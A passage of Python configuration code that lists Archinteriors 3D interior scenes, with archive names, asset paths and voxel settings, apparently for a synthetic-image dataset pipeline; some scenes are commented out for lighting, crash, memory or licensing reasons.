# scenes.append({"name": "ai_021_006", "archive_file": "Archinteriors_21_06.rar", "asset_file": os.path.join("06", "06"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_021_007", "archive_file": "Archinteriors_21_07.rar", "asset_file": os.path.join("07", "07"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_021_008", "archive_file": "Archinteriors_21_08.rar", "asset_file": os.path.join("08", "08"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_021_009", "archive_file": "Archinteriors_21_09.rar", "asset_file": os.path.join("09", "09"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_021_010", "archive_file": "Archinteriors_21_10.rar", "asset_file": os.path.join("10", "10"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_022_001", "archive_file": "Archinteriors_22_01.rar", "asset_file": os.path.join("01", "01"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_022_002", "archive_file": "Archinteriors_22_02.rar", "asset_file": os.path.join("02", "02"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_022_003", "archive_file": "Archinteriors_22_03.rar", "asset_file": os.path.join("03", "03"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_022_004", "archive_file": "Archinteriors_22_04.rar", "asset_file": os.path.join("04", "04"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_022_005", "archive_file": "Archinteriors_22_05.rar", "asset_file": os.path.join("05", "05"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_022_006", "archive_file": "Archinteriors_22_06.rar", "asset_file": os.path.join("06", "06"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_022_007", "archive_file": "Archinteriors_22_07.rar", "asset_file": os.path.join("07", "07"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_022_008", "archive_file": "Archinteriors_22_08.rar", "asset_file": os.path.join("08", "08"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_022_009", "archive_file": "Archinteriors_22_09.rar", "asset_file": os.path.join("09", "09"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_022_010", "archive_file": "Archinteriors_22_10.rar", "asset_file": os.path.join("10", "10"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_023_001", "archive_file": "Archinteriors_23_01.part1.rar", "asset_file": os.path.join("01", "01"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_023_002", "archive_file": "Archinteriors_23_02.part1.rar", "asset_file": os.path.join("02", "02"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_023_003", "archive_file": "Archinteriors_23_03.part1.rar", "asset_file": os.path.join("03", "03"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_023_004", "archive_file": "Archinteriors_23_04.part1.rar", "asset_file": os.path.join("04", "04"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_023_005", "archive_file": "Archinteriors_23_05.part1.rar", "asset_file": os.path.join("05", "05"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_023_006", "archive_file": "Archinteriors_23_06.part1.rar", "asset_file": os.path.join("06", "06"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_023_007", "archive_file": "Archinteriors_23_07.rar", "asset_file": os.path.join("07", "07"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_023_008", "archive_file": "Archinteriors_23_08.part1.rar", "asset_file": os.path.join("08", "08"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_023_009", "archive_file": "Archinteriors_23_09.part1.rar", "asset_file": os.path.join("09", "09"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_023_010", "archive_file": "Archinteriors_23_10.part1.rar", "asset_file": os.path.join("10", "10"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_024_001", "archive_file": "Archinteriors24_001.rar", "asset_file": os.path.join("001", "Archinteriors_24_hall_001"), "normalization_policy": "v0", "scene_extent_meters": 50.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_024_002", "archive_file": "Archinteriors24_002.rar", "asset_file": os.path.join("002", "Archinteriors_24_hall_002"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_024_003", "archive_file": "Archinteriors24_003.rar", "asset_file": os.path.join("003", "Archinteriors_24_hall_003"), "normalization_policy": "v0", "scene_extent_meters": 80.0, "voxel_extent_meters": 0.2})
scenes.append({"name": "ai_024_004", "archive_file": "Archinteriors24_004.rar", "asset_file": os.path.join("004", "Archinteriors_24_hall_004"), "normalization_policy": "v0", "scene_extent_meters": 50.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_024_005", "archive_file": "Archinteriors24_005.rar", "asset_file": os.path.join("005", "Archinteriors_24_hall_005"), "normalization_policy": "v0", "scene_extent_meters": 80.0, "voxel_extent_meters": 0.2})
scenes.append({"name": "ai_024_006", "archive_file": "Archinteriors24_006.rar", "asset_file": os.path.join("006", "Archinteriors_024_hall_006"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_024_007", "archive_file": "Archinteriors24_007.rar", "asset_file": os.path.join("007", "Archinteriors_024_hall_007"), "normalization_policy": "v0", "scene_extent_meters": 50.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_024_008", "archive_file": "Archinteriors24_008.rar", "asset_file": os.path.join("008", "Archinteriors_024_hall_08"), "normalization_policy": "v0", "scene_extent_meters": 50.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_024_009", "archive_file": "Archinteriors24_009.rar", "asset_file": os.path.join("009", "Archinteriors_024_hall_009"), "normalization_policy": "v0", "scene_extent_meters": 150.0, "voxel_extent_meters": 0.5})
scenes.append({"name": "ai_024_010", "archive_file": "Archinteriors24_010.rar", "asset_file": os.path.join("010", "Archinteriors_24_hall_010_hall"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_024_011", "archive_file": "Archinteriors24_011.rar", "asset_file": os.path.join("011", "Archinteriors_24_hall_011_hall"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_024_012", "archive_file": "Archinteriors24_012.rar", "asset_file": os.path.join("012", "Archinteriors_24_hall_012_hall"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_024_013", "archive_file": "Archinteriors24_013.rar", "asset_file": os.path.join("013", "Archinteriors_24_hall_013_hall"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_024_014", "archive_file": "Archinteriors24_014.rar", "asset_file": os.path.join("014", "Archinteriors_24_hall_014_hall"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_024_015", "archive_file": "Archinteriors24_015.rar", "asset_file": os.path.join("015", "Archinteriors_24_hall_015_hall"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_024_016", "archive_file": "Archinteriors24_016.rar", "asset_file": os.path.join("016", "Archinteriors_24_hall_016_hall"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_024_017", "archive_file": "Archinteriors24_017.rar", "asset_file": os.path.join("017", "Archinteriors_24_hall_017_hall"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_024_018", "archive_file": "Archinteriors24_018.rar", "asset_file": os.path.join("018", "Archinteriors_24_hall_018_hall"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_024_019", "archive_file": "Archinteriors24_019.rar", "asset_file": os.path.join("019", "Archinteriors_24_hall_019_hall"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
# slightly bad lighting
# scenes.append({"name": "ai_024_020", "archive_file": "Archinteriors24_020.rar", "asset_file": os.path.join("020", "Archinteriors_24_hall_020_hall"), "normalization_policy": "v0", "scene_extent_meters": 50.0, "voxel_extent_meters": 0.1})
# Archinteriors volume 25 is not distributed under the "Royalty Free Licence - All Extended Uses" license, so we exclude it
scenes.append({"name": "ai_026_001", "archive_file": "Archinteriors_26_1.rar", "asset_file": os.path.join("Archinteriors_26_1", "Archinteriors_26_001"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_026_002", "archive_file": "Archinteriors_26_2.rar", "asset_file": os.path.join("Archinteriors_26_2", "Archinteriors_26_002"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_026_003", "archive_file": "Archinteriors_26_3.rar", "asset_file": os.path.join("Archinteriors_26_3", "Archinteriors_26_003"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_026_004", "archive_file": "Archinteriors_26_4.rar", "asset_file": os.path.join("Archinteriors_26_4", "Archinteriors_26_004"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_026_005", "archive_file": "Archinteriors_26_5.rar", "asset_file": os.path.join("Archinteriors_26_5", "Archinteriors_26_005"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_026_006", "archive_file": "Archinteriors_26_6.rar", "asset_file": os.path.join("Archinteriors_26_6", "Archinteriors_26_006"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_026_007", "archive_file": "Archinteriors_26_7.rar", "asset_file": os.path.join("Archinteriors_26_7", "Archinteriors_26_007"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_026_008", "archive_file": "Archinteriors_26_8.rar", "asset_file": os.path.join("Archinteriors_26_8", "Archinteriors_26_008"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_026_009", "archive_file": "Archinteriors_26_9.rar", "asset_file": os.path.join("Archinteriors_26_9", "Archinteriors_26_009"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
# generate_merged_gi_files.py is very slow
# scenes.append({"name": "ai_026_010", "archive_file": "Archinteriors_26_10.rar", "asset_file": os.path.join("Archinteriors_26_10", "Archinteriors_26_010"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_026_011", "archive_file": "Archinteriors_26_11.rar", "asset_file": os.path.join("Archinteriors_26_11", "Archinteriors_26_011"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_026_012", "archive_file": "Archinteriors_26_12.rar", "asset_file": os.path.join("Archinteriors_26_12", "Archinteriors_26_012"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_026_013", "archive_file": "Archinteriors_26_13.rar", "asset_file": os.path.join("Archinteriors_26_13", "Archinteriors_26_013"), "normalization_policy": "v0", "scene_extent_meters": 80.0, "voxel_extent_meters": 0.2})
scenes.append({"name": "ai_026_014", "archive_file": "Archinteriors_26_14.rar", "asset_file": os.path.join("Archinteriors_26_14", "Archinteriors_026_014"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_026_015", "archive_file": "Archinteriors_26_15.rar", "asset_file": os.path.join("Archinteriors_26_15", "Archinteriors_26_015"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_026_016", "archive_file": "Archinteriors_26_16.rar", "asset_file": os.path.join("Archinteriors_26_16", "Archinteriors_26_16"), "normalization_policy": "v0", "scene_extent_meters": 80.0, "voxel_extent_meters": 0.2})
scenes.append({"name": "ai_026_017", "archive_file": "Archinteriors_26_17.rar", "asset_file": os.path.join("Archinteriors_26_17", "Archinteriors_26_017"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_026_018", "archive_file": "Archinteriors_26_18.rar", "asset_file": os.path.join("Archinteriors_26_18", "Archinteriors_26_018"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_026_019", "archive_file": "Archinteriors_26_19.rar", "asset_file": os.path.join("Archinteriors_26_19", "Archinteriors_26_19"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_026_020", "archive_file": "Archinteriors_26_20.rar", "asset_file": os.path.join("Archinteriors_26_20", "Archinteriors_26_020"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_027_001", "archive_file": "Archinteriors_27_001.rar", "asset_file": os.path.join("Archinteriors_27_001", "AI_27_001_cam001_cam002_cam003"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
# crashes during export
# scenes.append({"name": "ai_027_002", "archive_file": "Archinteriors_27_002.rar", "asset_file": os.path.join("Archinteriors_27_002", "AI_027_002_cam001_cam002_cam003"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_027_003", "archive_file": "Archinteriors_27_003.rar", "asset_file": os.path.join("Archinteriors_27_003", "AI_27_003_cam001_cam002_cam003"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_027_004", "archive_file": "Archinteriors_27_004.rar", "asset_file": os.path.join("Archinteriors_27_004", "AI_27_004_cam001_cam002_cam003"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_027_005", "archive_file": "Archinteriors_27_005.rar", "asset_file": os.path.join("Archinteriors_27_005", "AI_27_005_cam001_cam002_cam003"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_027_006", "archive_file": "Archinteriors_27_006.rar", "asset_file": os.path.join("Archinteriors_27_006", "AI_27_006_cam001"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_027_007", "archive_file": "Archinteriors_27_007.rar", "asset_file": os.path.join("Archinteriors_27_007", "AI_27_07_cam001_cam002"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_027_008", "archive_file": "Archinteriors_27_008.rar", "asset_file": os.path.join("Archinteriors_27_008", "AI_027_008_cam001_cam002_cam004"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_027_009", "archive_file": "Archinteriors_27_009.rar", "asset_file": os.path.join("Archinteriors_27_009", "AI_27_009_cam001"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_027_010", "archive_file": "Archinteriors_27_010.rar", "asset_file": os.path.join("Archinteriors_27_010", "AI_27_10_cam001_cam002_cam003"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_028_001", "archive_file": "Archinteriors_28_001.rar", "asset_file": os.path.join("01", "AI28_01"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_028_002", "archive_file": "Archinteriors_28_002.rar", "asset_file": os.path.join("02", "AI28_02"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_028_003", "archive_file": "Archinteriors_28_003.rar", "asset_file": os.path.join("03", "AI28_03"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_028_004", "archive_file": "Archinteriors_28_004.rar", "asset_file": os.path.join("04", "AI28_04"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_028_005", "archive_file": "Archinteriors_28_005.rar", "asset_file": os.path.join("05", "AI28_05"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_028_006", "archive_file": "Archinteriors_28_006.rar", "asset_file": os.path.join("06", "AI28_06"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
# excluded: slightly bad lighting
# scenes.append({"name": "ai_028_007", "archive_file": "Archinteriors_28_007.rar", "asset_file": os.path.join("07", "AI28_07"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_028_008", "archive_file": "Archinteriors_28_008.rar", "asset_file": os.path.join("08", "AI28_08"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_028_009", "archive_file": "Archinteriors_28_009.rar", "asset_file": os.path.join("09", "AI28_09"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_028_010", "archive_file": "Archinteriors_28_010.rar", "asset_file": os.path.join("10", "AI28_10"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_029_001", "archive_file": "AI29_Scene_01.rar", "asset_file": os.path.join("Scene_01", "AI29_01_camera_1,2_ver2010"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_029_002", "archive_file": "AI29_Scene_02.rar", "asset_file": os.path.join("Scene_02", "AI29_02_camera_1,2,3_ver2010"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_029_003", "archive_file": "AI29_Scene_03.rar", "asset_file": os.path.join("Scene_03", "AI29_03_camera_1,2,3_ver2010"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_029_004", "archive_file": "AI29_Scene_04.rar", "asset_file": os.path.join("Scene_04", "AI29_04 v2010"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_029_005", "archive_file": "AI29_Scene_05.rar", "asset_file": os.path.join("Scene_05", "AI29_05 v2010"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
#
# Archinteriors volumes 30-39
#
scenes.append({"name": "ai_030_001", "archive_file": "AM30_Scene_001.rar", "asset_file": os.path.join("Scene_001", "AI30_001_camera_1_ver2010"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_030_002", "archive_file": "AM30_Scene_002.rar", "asset_file": os.path.join("Scene_002", "AI30_002_camera_1_2010"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_030_003", "archive_file": "AM30_Scene_003.rar", "asset_file": os.path.join("Scene_003", "AI30_003_camera_1_ver2010"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_030_004", "archive_file": "AM30_Scene_004.rar", "asset_file": os.path.join("Scene_004", "AI30_004_camera_1_ver2010"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_030_005", "archive_file": "AM30_Scene_005.rar", "asset_file": os.path.join("Scene_005", "AI30_005_camera_1_ver2010"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
# excluded: bad lighting
# scenes.append({"name": "ai_030_006", "archive_file": "AM30_Scene_006.rar", "asset_file": os.path.join("Scene_006", "AI30_006_camera_1_ver2010"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_030_007", "archive_file": "AM30_Scene_007.rar", "asset_file": os.path.join("Scene_007", "AI30_007_camera_1_ver2010"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_030_008", "archive_file": "AM30_Scene_008.rar", "asset_file": os.path.join("Scene_008", "AI30_008_camera1_ver2010"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_030_009", "archive_file": "AM30_Scene_009.rar", "asset_file": os.path.join("Scene_009", "AI30_009_camera_1_ver2010"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_030_010", "archive_file": "AM30_Scene_010.rar", "asset_file": os.path.join("Scene_010", "AI30_010_camera_1_ver2010"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_031_001", "archive_file": "Archinteriors_31_Scene_001.rar", "asset_file": os.path.join("Scene_001", "AI31_001"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
# generate_merged_gi_files.py is very slow
# scenes.append({"name": "ai_031_002", "archive_file": "Archinteriors_31_Scene_002.rar", "asset_file": os.path.join("Scene_002", "AI31_002"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_031_003", "archive_file": "Archinteriors_31_Scene_003.rar", "asset_file": os.path.join("Scene_003", "AI_003"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_031_004", "archive_file": "Archinteriors_31_Scene_004.rar", "asset_file": os.path.join("Scene_004", "AI31_004"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_031_005", "archive_file": "Archinteriors_31_Scene_005.rar", "asset_file": os.path.join("Scene_005", "AI31_005"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_031_006", "archive_file": "Archinteriors_31_Scene_006.rar", "asset_file": os.path.join("Scene_006", "AI31_006"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_031_007", "archive_file": "Archinteriors_31_Scene_007.rar", "asset_file": os.path.join("Scene_007", "AI31_007"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_031_008", "archive_file": "Archinteriors_31_Scene_008.rar", "asset_file": os.path.join("Scene_008", "AI31_008"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_031_009", "archive_file": "Archinteriors_31_Scene_009.rar", "asset_file": os.path.join("Scene_009", "AI31_009"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_031_010", "archive_file": "Archinteriors_31_Scene_010.rar", "asset_file": os.path.join("Scene_010", "AI31_010"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_032_001", "archive_file": "Archinteriors_32_Scene_001.rar", "asset_file": os.path.join("Scene_001", "AI32_001"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_032_002", "archive_file": "Archinteriors_32_Scene_002.rar", "asset_file": os.path.join("Scene_002", "AI32_002"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_032_003", "archive_file": "Archinteriors_32_Scene_003.rar", "asset_file": os.path.join("Scene_003", "AI32_003"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_032_004", "archive_file": "Archinteriors_32_Scene_004.rar", "asset_file": os.path.join("Scene_004", "AI32_004"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_032_005", "archive_file": "Archinteriors_32_Scene_005.rar", "asset_file": os.path.join("Scene_005", "AI32_005"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
# excluded: bad lighting
# scenes.append({"name": "ai_032_006", "archive_file": "Archinteriors_32_Scene_006.rar", "asset_file": os.path.join("Scene_006", "AI32_006"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_032_007", "archive_file": "Archinteriors_32_Scene_007.rar", "asset_file": os.path.join("Scene_007", "AI32_007"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_032_008", "archive_file": "Archinteriors_32_Scene_008.rar", "asset_file": os.path.join("Scene_008", "AM32_008"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_032_009", "archive_file": "Archinteriors_32_Scene_009.rar", "asset_file": os.path.join("Scene_009", "AI32_009"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
# runs out of memory when parsing the OBJ file
# scenes.append({"name": "ai_032_010", "archive_file": "Archinteriors_32_Scene_010.rar", "asset_file": os.path.join("Scene_010", "AI32_010"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_033_001", "archive_file": "AI33_Scene_001.rar", "asset_file": os.path.join("Scene_001", "AI33_001"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_033_002", "archive_file": "AI33_Scene_002.rar", "asset_file": os.path.join("Scene_002", "AI33_002"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
# crashes during export
# scenes.append({"name": "ai_033_003", "archive_file": "AI33_Scene_003.rar", "asset_file": os.path.join("Scene_003", "AI33_003"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_033_004", "archive_file": "AI33_Scene_004.rar", "asset_file": os.path.join("Scene_004", "AI33_004"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_033_005", "archive_file": "AI33_Scene_005.rar", "asset_file": os.path.join("Scene_005", "AI33_005"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
# generate_merged_gi_files.py is very slow
# scenes.append({"name": "ai_033_006", "archive_file": "AI33_Scene_006.rar", "asset_file": os.path.join("Scene_006", "AI33_006"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_033_007", "archive_file": "AI33_Scene_007.rar", "asset_file": os.path.join("Scene_007", "AI33_007"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_033_008", "archive_file": "AI33_Scene_008.rar", "asset_file": os.path.join("Scene_008", "AI33_008"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_033_009", "archive_file": "AI33_Scene_009.rar", "asset_file": os.path.join("Scene_009", "AI33_009"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_033_010", "archive_file": "AI33_Scene_010.rar", "asset_file": os.path.join("Scene_010", "AI33_010"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_034_001", "archive_file": "AI34_Scene_001.rar", "asset_file": os.path.join("Scene_001", "AI34_001"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_034_002", "archive_file": "AI34_Scene_002.rar", "asset_file": os.path.join("Scene_002", "AI34_002"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
